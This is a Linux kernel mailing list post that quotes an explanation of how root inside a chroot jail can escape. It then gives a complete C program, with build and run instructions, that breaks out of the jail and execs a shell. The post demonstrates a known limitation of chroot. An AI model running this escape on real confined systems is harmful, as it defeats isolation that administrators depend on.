Al Viro <viro@ftp.linux.org.uk> wrote:
quoted text
>  If you are within chroot jail and capable of chroot(), you can chdir to
>  its root, then chroot() to subdirectory and you've got cwd outside of
>  your new root.  After that you can chdir all way out to original
>  root.

Here is some code I wrote a while back to demonstrate that escape
method.

/*
 *  Break a chroot
 *
 *  Compile this with
 *
 *     gcc -static -Wall break-chroot.c -o break-chroot
 *
 *  Get a root shell in the chrooted environment and run
 *
 *    ./break-chroot
 *
 *  Nick Craig-Wood <nick@craig-wood.com>
 *
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <error.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sys/types.h>

#define SHELL "bin/sh"		/* no leading / */

int main(void)
{
    struct stat buf;
    if (chdir("/"))
	perror("chdir /"), exit(1);

    printf("Making escape tunnel\n");
    mkdir("/tmp", 01777);
    mkdir("/tmp/escape-tunnel", 0755);

    printf("Doing escape chroot leaving cwd behind\n");
    if (chroot("/tmp/escape-tunnel"))
	perror("chroot /tmp/escape-tunnel"), exit(1);

    printf("Exploit cwd being above the root and find a " SHELL " to run\n");
    do {
	printf("Going up...\n");
	if (chdir("../"))
	    perror("chdir ../"), exit(1);
    } while (stat(SHELL, &buf) != 0);

    printf("Chrooting back into the root directory\n");
    if (chroot("."))
	perror("chroot ."), exit(1);

    printf("If this doesn't error you are out of chroot!\n");
    if (execl(SHELL, SHELL, 0))
	perror("exec " SHELL), exit(1);

    printf("Something wicked happened!\n");
    return 1;
}

-- 
Nick Craig-Wood <nick@craig-wood.com> -- http://www.craig-wood.com/nick
-
unsubscribe notice
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/